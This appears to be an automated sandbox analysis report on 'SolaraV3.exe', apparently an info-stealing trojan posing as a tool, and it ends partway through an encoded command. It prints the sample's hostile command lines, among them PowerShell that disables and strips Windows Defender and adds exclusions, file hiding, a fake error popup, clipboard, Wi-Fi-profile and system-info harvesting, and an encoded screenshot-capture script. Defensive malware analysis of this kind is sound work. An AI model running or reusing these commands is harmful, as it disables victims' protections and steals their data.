Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052833376.00007FFB1AB18000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050822213.00007FFB0C43D000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051568182.00007FFB0C5EB000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053258667.00007FFB1BB2E000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050061158.00007FFB0BFE8000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051838761.00007FFB0C613000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053545569.00007FFB1C267000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2052222811.00007FFB18B84000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054325875.00007FFB1E4CC000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000000.1564954986.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2053814093.00007FFB1C3C7000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2054068816.00007FFB1E47C000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2047749339.00007FFB0B807000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000002.00000002.2051258231.00007FFB0C5B7000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Very long command line found

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: libssl-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
Source: python310.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
Source: sqlite3.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
Source: unicodedata.pyd.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9937050102833638

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8CAFC GetLastError,FormatMessageW,

110_2_00007FF74EE8CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		110_2_00007FF74EE8EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		110_2_00007FF74EEBB57C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93144 GetDiskFreeSpaceExW,

110_2_00007FF74EE93144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\Users\user~1\AppData\Local\Temp\_MEI28842

Jump to behavior

Source: SolaraV3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\SolaraV3.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

Source: SolaraV3.exe	String found in binary or memory: set-addPolicy
Source: SolaraV3.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Users\user\Desktop\SolaraV3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpA